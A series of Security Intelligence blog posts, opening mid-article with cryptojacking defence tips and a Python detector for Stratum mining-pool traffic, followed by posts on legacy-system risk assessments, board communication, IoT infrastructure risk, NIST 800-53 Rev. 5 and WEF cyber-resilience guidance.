  • Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
  • With browser-based cryptojacking, a threat actor can forgo wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

  • Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
  • Restrict outbound connections to cryptomining pools to help detect and prevent cryptomining within the organization’s environments. Pool traffic typically uses the Stratum protocol (newline-delimited JSON-RPC), which can be recognized on the wire even when the pool address is new, unless the miner wraps it in TLS.
  • Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing. Because this breaks most modern web applications, a more practical option for most organizations is a browser extension or proxy-level block list of known mining-script domains.
  • Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
  • Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
  • Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
  • Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.
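As an added example (not X-Force code) supporting the second and sixth tips above, here is a Python detector for mining-pool traffic. Rather than matching a list of pool addresses, it scores each captured TCP payload on the Stratum JSON-RPC methods and miner user-agent strings it contains, with the destination port and an external destination as corroborating signals only. The flows, the port list and the scoring weights are assumptions made for illustration; the TEST-NET-2 addresses stand in for internet hosts. If a miner wraps Stratum in TLS, the payload check fails and only the port and destination signals remain, which is why those two never alert on their own here.

```python
"""Score captured TCP payloads for Stratum mining-pool traffic.
Added example for this article, not IBM X-Force code.
All flows below are constructed; 198.51.100.0/24 (TEST-NET-2) stands in for internet hosts."""
import ipaddress
import json
import re

# Stratum-specific method names (Bitcoin-style pools): strong signal on their own.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "mining.notify", "mining.set_difficulty", "mining.extranonce.subscribe"}
# Generic names used by Monero/CryptoNight pools (xmrig-style): need corroboration,
# because an internal JSON-RPC API could legitimately expose a "login" method.
CRYPTONIGHT_METHODS = {"login", "getjob", "submit", "keepalived"}
# Miner agent strings commonly sent in the login/subscribe message.
MINER_AGENT_RE = re.compile(r"\b(xmrig|xmr-stak|cpuminer|minerd|ccminer|cgminer|nheqminer)\b", re.I)
# Assumption: ports frequently used by public pools; tune from your own telemetry.
POOL_PORTS = {3333, 4444, 5555, 7777, 9999, 14444}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ALERT_THRESHOLD = 2

# Constructed flows: (src_ip, dst_ip, dst_port, payload_bytes).
SAMPLES = [
    # xmrig-style login to a CryptoNight pool on a typical pool port: should alert
    ("10.0.0.5", "198.51.100.40", 3333,
     b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44AbCd","pass":"x","agent":"XMRig/2.14.1"}}\n'),
    # Bitcoin-style Stratum subscribe from cpuminer: should alert
    ("10.0.0.6", "198.51.100.41", 4444,
     b'{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.0"]}\n'),
    # ordinary JSON-RPC to an internal API: must not alert
    ("10.0.0.7", "10.0.1.20", 8080,
     b'{"jsonrpc":"2.0","id":7,"method":"getBalance","params":[]}\n'),
    # TLS ClientHello fragment: binary, skipped
    ("10.0.0.8", "198.51.100.42", 443, b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),
    # share submission later in the same mining session: generic method, corroborated
    ("10.0.0.5", "198.51.100.40", 3333,
     b'{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"abc","job_id":"1","nonce":"deadbeef","result":"00"}}\n'),
]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def classify_payload(payload: bytes):
    """Return (score, reasons) from the newline-delimited JSON-RPC in one payload."""
    score, reasons = 0, []
    try:
        text = payload.decode("utf-8")
    except UnicodeDecodeError:          # TLS or other binary protocol: not plaintext Stratum
        return 0, reasons
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            msg = json.loads(line)
        except json.JSONDecodeError:
            continue
        method = msg.get("method")
        if method in STRATUM_METHODS:
            score += 2
            reasons.append(f"stratum method {method!r}")
        elif method in CRYPTONIGHT_METHODS:
            score += 1
            reasons.append(f"pool-style method {method!r}")
        params = msg.get("params")
        haystack = params.get("agent", "") if isinstance(params, dict) else json.dumps(params)
        m = MINER_AGENT_RE.search(haystack or "")
        if m:
            score += 2
            reasons.append(f"miner agent {m.group(1)!r}")
    return score, reasons


def detect_mining(flows):
    """Return an alert record for every flow whose combined score reaches the threshold."""
    alerts = []
    for src, dst, dport, payload in flows:
        score, reasons = classify_payload(payload)
        if score == 0:
            continue                    # port or destination alone never alerts
        if dport in POOL_PORTS:
            score += 1
            reasons.append(f"common pool port {dport}")
        if not is_internal(dst):
            score += 1
            reasons.append("external destination")
        if score >= ALERT_THRESHOLD:
            alerts.append({"src": src, "dst": dst, "dport": dport, "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_mining(SAMPLES):
        print(f'{a["src"]} -> {a["dst"]}:{a["dport"]} score={a["score"]} ' + "; ".join(a["reasons"]))
```

On the constructed flows this raises three alerts (the login, the subscribe and the later share submission) and stays quiet on the internal JSON-RPC call and the TLS fragment. Each alert carries its reasons, so an analyst can see at a glance whether the call was on a Stratum-only method or merely a generic one that happened to go to an external pool port.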

The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

Author: Charles DeBeck

cyber risk, Cybercrime, Internet of Things (IoT), IoT Security, Legacy Applications, Malware, Multifactor Authentication (MFA), Risk Assessment, Risk Management, Security Strategy, Security Training, Security Trends, Threat Detection, Vulnerabilities,

To Move Forward Securely, Look Backward With Ongoing Risk Assessments

As security professionals, we’re constantly on the lookout for the latest research and trends to stay on top of new threats. This is sensible in that novel attacks seem most likely to go undetected, but if we focus on the future at the expense of performing risk assessments to maintain defenses against existing threats, we will always be one step behind attackers.

It’s said that history doesn’t repeat itself, but it often rhymes. This is particularly true with cybercrime. As we’ve watched malware trends shift from one generation of technology to the next, it’s clear that old techniques are often reused.

Legacy Code, Current Security Problems

Technology moves quickly, and most organizations have a lot on their plates dealing with a constant influx of new apps and devices. Each new wave of changes brings a new codebase and a new attack surface. It’s reasonable to take these risks seriously, but in this constant race to address new threats, we can accrue security debt that opens us up to threats that have not been completely addressed in older technology.

While it’s well-known that updating software is a key part of keeping the organization secure, this is not always practical. Most companies have legacy technology that must be kept for one reason or another, often because it’s too expensive or difficult to replace. Millions of computers are still using antiquated software, much of which is known to be problematic. For example, according to Statcounter, Windows XP still holds around 2 percent of the global desktop Windows version market share, and Windows 7, whose extended support ends in January 2020, still holds around 34 percent.

Even code that’s current, has been in use for years and is considered safe can sometimes hide major problems. There are plenty of examples from recent years in which vulnerabilities were found in code that was in active use for years or even decades, such as Heartbleed, Shellshock, Meltdown and Spectre.

From a return on investment (ROI) perspective, it makes sense for criminals to spend as little time and effort as possible creating new attacks when existing problems can easily be exploited. Old malware and vulnerabilities linger on a surprising number of systems.

Old Attack Types Resurface

Threat actors aren’t just recycling old vulnerabilities and malware; they are also fond of reusing old attack vectors, particularly those that have been off the industry’s radar for so long that we forget they’re a problem.

For example, boot sector viruses and macro viruses were once considered all but dead, as heuristic detection became so effective that even brand new malware was usually identified as soon as it was released. But once attackers rediscovered these techniques, a new generation of malware researchers had to resurrect skills from the past to reverse engineer these threats. As Krebs on Security reported last year, even malware sent by snail mail has made a bizarre reappearance.

The Pattern Repeats in New Devices

Sometimes old attacks are ported to new operating systems and devices, which are perceived as less threat-prone than more traditional computers. Malware authors have had years of practice porting Windows threats to other operating systems, and attacks have been carried out on everything from mobile phones to internet-connected refrigerators.

Researchers have been predicting internet of things (IoT) security issues for almost 20 years, due in large part to device manufacturers failing to learn the lessons of the past. Yet many “smart” devices fail to follow basic IoT security best practices, including using default login credentials and failing to include software update capabilities.

Start Addressing Security Debt With Ongoing Risk Assessments

The good news is that many of the techniques that help with addressing security debt will also help mitigate the problems that could come with new threats. Perhaps the best strategy is to conduct thorough and ongoing risk assessments to identify which assets and vulnerabilities are present in your environment. You can then move on to mitigating the biggest risks for different kinds of devices and code.

For Old Code or Devices

Identify and update what you’re able to. For what you cannot update, harden the machines as much as possible and monitor them closely. Hardening may include segregating these devices from the rest of your network, limiting the privileges of the device and/or using application whitelisting.

For Newer IoT Devices

If at all possible, purchase devices that were built with security in mind. This should include, at a minimum, the ability to change usernames and passwords as well as software update mechanisms. Ask vendors to practice security by design principles as outlined by the Open Web Application Security Project (OWASP). You can also put risky devices on segregated portions of your network while monitoring traffic in and out of these areas.

For Everything Else

New devices with updated software can still fall victim to old attack techniques. It’s important to make sure you’re covering the basics, such as practicing good password hygiene and using a reputable security suite. But there are other protection steps you should also be taking.

For instance, use layers of defense wherever possible, such as multifactor authentication to protect login credentials rather than just a username and password. Set security policies and procedures and make sure your users are briefed on them early and often. Tailor your practices so that the people in your environment are able to do what they need to without undue trouble, but also without allowing more privileges than are truly necessary.

Invest Wisely to Combat Both Old and New Threats

Protecting a network can be a costly and difficult endeavor if you apply tools blindly in fear of future problems. Spend your security investments more wisely by regularly and thoroughly assessing which assets you have to protect and mitigate any risks to those assets — whether they’re old or new vulnerabilities. You don’t need to have the most newfangled technology to make your environments an unattractive target for cybercriminals.

The post To Move Forward Securely, Look Backward With Ongoing Risk Assessments appeared first on Security Intelligence.

Author: Lysa Myers

Business Continuity, C-Suite, Chief Information Officer (CIO), Chief Information Security Officer (CISO), CISO, cyber risk, Governance, Incident Response (IR), Risk, Risk Management, Security Leadership, Security Spending,

The Language of Business: Where the Board of Directors and Security Leaders Can Meet

A few years back, a business association asked me to deliver a cybersecurity presentation. I knew some in attendance would report back to their respective board of directors, and I expected it to be a challenging session because cybersecurity knowledge and literacy would be all over the map.

It’s a situation I’ve encountered regularly. I remember in one session with about 40 people, I asked what they thought “cybersecurity” meant. Somehow, I think I got 45 different answers. Even within an organization’s board of directors, people who absolutely need to be part of the cybersecurity conversation today, you’d likely get the same variance in responses.

But I welcomed the session because it gave me an opportunity to pilot a new presentation tactic. The presentation focused more on business in general and business development as opposed to cybersecurity, and the presentation style was so outside-the-box, I was actually nervous.

To Engage the Board, Talk Business, Not Cybersecurity

Going in, I knew some of the attendees expected to hear some cybersecurity techno-babble. I did none of that. Instead, I used the simplest possible language and cartoons to disarm these senior leaders for one reason: I wanted them to feel comfortable and able to talk freely about that bogeyman topic, cybersecurity.

By focusing on business and risk instead of cybersecurity, everybody in the room was fully tuned in. Cybersecurity was just color.

You see, by avoiding the technical nature of cybersecurity, the participants made the mental jump from “cybersecurity as an IT issue” to “cybersecurity as a business and risk issue.” They saw how cybersecurity issues could impact and influence their business development plans or pose growth problems. I remember one participant emphatically saying to the group, “You just made me understand this cybersecurity thing isn’t my IT department’s problem … it’s my problem!”

And just like that, you have a new teammate.

CSOs Are From Mars, CISOs Are From Venus and the Board of Directors Are From Andromeda

There has been a great deal of discussion on whether you should have a chief information officer (CIO), chief security officer (CSO) or chief information security officer (CISO), who should do what, what reporting chains should look like, and the need for this type of specialist. The good news is that there is increased interaction between these security leaders and CEOs and the board of directors. It’s a step in the right direction.

But interaction is not enough; it’s speaking the same language that matters. To do that, you actually need to know what you’re in the business of. No two organizations are alike.

As a general observation, I’ve found that security professionals sometimes have difficulty understanding what drives business in their organization. Reading financial statements and appreciating the importance of cash flow may not be a core competency of security teams, but in practice, they should be.

The same can be said for understanding supply chains, knowing who the key customers and vendors are, and determining which costs can really impact the organization’s ability to generate revenue or meet its business mission. These are all issues that senior leaders and the board of directors care about.

Now, these same issues do not necessarily fall within a security professional’s area of responsibility, but the ability to demonstrate business acumen gives the security professional incredible influence with these other players. Therefore, if security employees can demonstrate that they have more than a one-track mind, they may suddenly find more allies within the organization.

Your Job Is to Keep the Business Going

To keep the business going, you need to know how it works. That’s why asking the right business operations questions will make all the difference. You shouldn’t be asking your colleagues, “How long can you go without a computer?” (The answer almost certainly will be, “I can’t.”) Instead, you should be asking, “You don’t have a computer for 72 hours, how do we keep the business going?” Or, “If we lose network capability for 48 hours, how do we survive the downtime?” You get the idea. Note the emphasis on teamwork.

Ask the right questions the right way and you’ll be better prepared to:

To Improve Your Cybersecurity Posture, You Need to Understand the Business

Most successful business leaders understand that rocky times are part of the normal business cycle. The best even expect rocky times, especially during business development phases. That’s not what worries them.

What worries them is whether the organization has the ability and resources to weather the storm. For this reason alone, IT and security professionals need to be able to talk business to the C-suite and the board of directors, especially if new security products need to be added into the organization’s portfolio.

Make Life Easy for Your Board of Directors

With increased pressure on the board of directors to play a more active role in cyber risk governance, it is incumbent on internal cybersecurity professionals to learn what makes the organization tick by talking return on investment, cost, growth metrics, cash flow, business development, resource management and so on. If you can speak the language of business, you are better positioned to demonstrate the value of cybersecurity investments to senior leaders. You’re making their life easier, which in turn makes your life easier.

So whether it’s a few online business basics and governance courses or talking with your nonsecurity colleagues about what drives the business, it’s a worthwhile investment in the grand scheme of things.

I understand these business spaces can sometimes make security employees uncomfortable. But if you can master the business language, you’ll suddenly find yourself not galaxies apart from your C-suite colleagues and board members, but rather in the same room, working together to meet the most pressing cybersecurity and business needs of the organization. That’s a good place to be.

The post The Language of Business: Where the Board of Directors and Security Leaders Can Meet appeared first on Security Intelligence.

Author: George Platsis


A Busy IT Infrastructure Can Lead to Security Disaster

Who doesn’t love new technology, especially when it promises to make tasks easier and improve productivity? That eagerness to add new technology — something IT staff often encourages security leadership to do — has led to the digital transformation, the use of digital technology to solve problems. Smartphones, tablets and cloud computing have been leading the way in the workplace’s digital makeover, but the growing popularity of the internet of things (IoT) could totally change the look of IT infrastructure.

However, digital transformation isn’t all fun and games for security staff. While security teams may enjoy new technology, it can also add cybersecurity complications, particularly when these technologies share an infrastructure.

The PCI-Compliant Vending Machine

During his keynote address at CPX 360 in February, Jeff Schwartz, vice president of North American engineering at Check Point, told a story of the upgraded break room vending machine. Because fewer people carry paper money or loose change, a company decides to upgrade its snack machine to take credit cards. That’s great news for the employee who wants his or her 3 p.m. chip fix but only uses plastic to pay.

However, as Schwartz pointed out, now that the vending machine accepts credit cards, it must follow payment card industry (PCI) compliance standards. If that gets overlooked, the vending machine could end up costing the company in fines. The vending machine will also be connected to the internet so it can process the transactions, which makes it a reachable endpoint that can be hacked. If the vending machine is compromised, it opens a door for threat actors to enter your network.

So, what initially looked like a convenience turned into a security headache. With the growth of the IoT and digital transformation, expect this to become a burgeoning risk vector. As Schwartz told his audience, shared resources and IT infrastructure create more opportunities to lose data.

Increased Reliance on Technology Impacts Risk

Simply put, new technology almost always has an impact on risk. New endpoints offer new potential openings for threat actors to exploit. That’s not to say that we don’t need or want the technology; instead, to better secure networks and data, we need to better understand what’s going on with those new endpoints.

With the IoT, devices, appliances and machinery we once never gave a second thought to are all now connected to the internet — but what do you know about that connectivity? New elevators are now smart elevators, for example, so not only are they adding another endpoint to your network, they are also collecting data.

A device such as an elevator is likely controlled by a third party, meaning that the third party also has access to the network and data. If the building is shared by a dozen companies, you add in a mixture of data and networks. Who is in charge of the security for the elevator? Who is responsible for the data collected and its protection? What do you know about the elevator company’s security practices? Did you even think you had to worry about the elevator?

Be Mindful of Customer Data

Digital transformation is accomplished not just with business efficiency in mind, but also for customer convenience. In fact, your customers want an easier interaction with your company, and that often comes through technologies such as artificial intelligence (AI), machine learning (ML) and the IoT. Customer-facing AI, such as chatbots, can improve customer communications, for example.

“Customer expectations are far exceeding what you can really do,” George Westerman, principal research scientist with the MIT Sloan Initiative on the Digital Economy, told CIO. “That means a fundamental rethinking about what we do with technology in organizations.”

So, yes, customers have high expectations for the technology your company uses to facilitate better consumer relationships. However, thanks to high-profile data breaches and increasing awareness about data privacy regulations, customers also want to make sure their data is safe. In fact, Schwartz noted in his speech that you shouldn’t be surprised if consumers begin to make their purchasing decisions based on the way your company collects, uses and stores customer data.

Are You in Control of Your IT Infrastructure?

This takes us back to shared IT infrastructure. It isn’t just a matter of knowing which endpoints are on the network and what data they collect, but of tracking how those endpoints change as the technology changes. Having a coffee pot operated by an app is a great convenience for your staff, but how does that impact data gathering? Same with that chatbot: It is certainly a convenient and perhaps cost-efficient way to build customer relations, but your security team had better know how the conversations are collected and how the company uses that data, or it could turn into a privacy nightmare.

We are still learning how much information sharing is happening on some infrastructures. For example, a smart TV may be an excellent way for an organization to view sensitive corporate or consumer (e.g., a patient in a hospital room) information, but at the same time, employees (or that patient) could use that same TV to tune into their Netflix or Hulu account during their lunch break. Suddenly, you have corporate data mingling with personal data. If it turns out that Netflix is the victim of a data breach, that sensitive corporate data is now at risk.

The more common the IoT and other emerging technologies become in the workplace, the more chief information security officers (CISOs), IT leaders and other decision-makers will need to consider the overall impact of every device using that IT infrastructure. It isn’t a matter of what is connected to your network, but how it is connected and whether you are able to control that connection’s security.

The post A Busy IT Infrastructure Can Lead to Security Disaster appeared first on Security Intelligence.

Author: Sue Poremba


Adopting the NIST 800-53 Control Framework? Learn More About the Anticipated Changes in 2019

The final version of the National Institute of Standards and Technology (NIST) Special Publication (SP) 800-53 Revision 5 is on the horizon for 2019. What does the initial public draft tell us about what we can expect in its final version? Even more importantly, what does it mean for organizations seeking to adopt the new guidelines?

NIST SP 800-53 Revision 5 is expected to deliver major updates to the existing fourth revision, which was originally published in 2013. Since its inception, this publication has been the de facto guideline for security control implementations, security assessments and Authorization to Operate (ATO) processes for government information systems. There are many draft changes in the fifth revision, but one of the most significant impacts is that it marks a departure from limiting the control sets to federal information systems. The framework is now recommended for all systems in all industries.

In addition to control baseline updates, other major changes NIST anticipates will be in the final version include:

  • A requirement that organizations designate a senior management official responsible for managing the security policies and procedures associated with each control family.
  • A restructuring of the controls to be more outcome-based, which leads to increased clarity, consistency and understanding.
  • Full integration of privacy controls into the security control catalog to create a consolidated view of all controls.
  • The addition of two new privacy control families: Individual Participation (IP) and Privacy Authorization (PA).
  • A near doubling in scope of the Program Management (PM) control family, with additional emphasis on privacy and data management.
  • New appendices detailing the relationship between security and privacy controls.

What Will NIST 800-53 Rev. 5 Mean For Organizations?

The changes expected in the fifth revision touch on a variety of subjects and affect a wide range of business and security functions. Below are some areas that will be particularly affected and considerations that will have a significant impact on how organizations manage their security programs.

Senior Management Ownership

First and foremost, leadership accountability is given much greater emphasis across the framework. Organizations will need to identify key senior management personnel to own specific policy efforts and oversight actions for the life of each system. By driving accountability from the top down, organizations stand to benefit from executive sponsorship of security policies and gain better visibility into the effectiveness of governance controls and the organization’s overall security status.

Data Privacy

Dedicated privacy control families and new privacy guidance woven into existing controls drive greater focus on privacy and sensitive data management. Privacy needs to be ingrained into all aspects of cybersecurity now and in the future, especially with new regulations in place to protect personal data. Organizations may need to review their org chart to ensure it provides the most effective strategic alignment between C-suite, security and privacy teams. Ownership of control implementations between security and privacy will be a key decision point when transitioning to the final release of Revision 5 in the near future.

Third-Party Assessments

NIST SP 800-53A will undergo a fifth revision in conjunction with the updates to SP 800-53. This is the companion document third-party assessors use as part of the ATO process to determine the effectiveness of control implementations and evaluate risk posture. Implementing and adapting the updated controls will be crucial to obtaining new ATOs and renewing existing ones in the long term.

How Can Business Leaders Enhance Security Over Time?

Chief information officers (CIOs), chief information security officers (CISOs) and other organizational leaders need to start thinking about how to advance security and privacy initiatives in unison to achieve business goals and manage risk effectively. The update to NIST 800-53 will affect each organization differently. It’s still important to perform due diligence to determine how the final changes apply in each unique situation; however, as a whole, adopting the recommended guidelines serves to unify security standards and help all organizations strengthen their security posture as the threat and regulatory landscapes evolve.

Additional information and the full list of changes in the NIST 800-53 Revision 5 draft can be found on the NIST website, along with the publication schedule.

The post Adopting the NIST 800-53 Control Framework? Learn More About the Anticipated Changes in 2019 appeared first on Security Intelligence.

Author: Jason Yakencheck


Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly gives way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber-resilient components for new IT and OT systems and to closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware of and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and the sharing of threat information and best practices are key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyberattacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

Author: Christophe Veltsos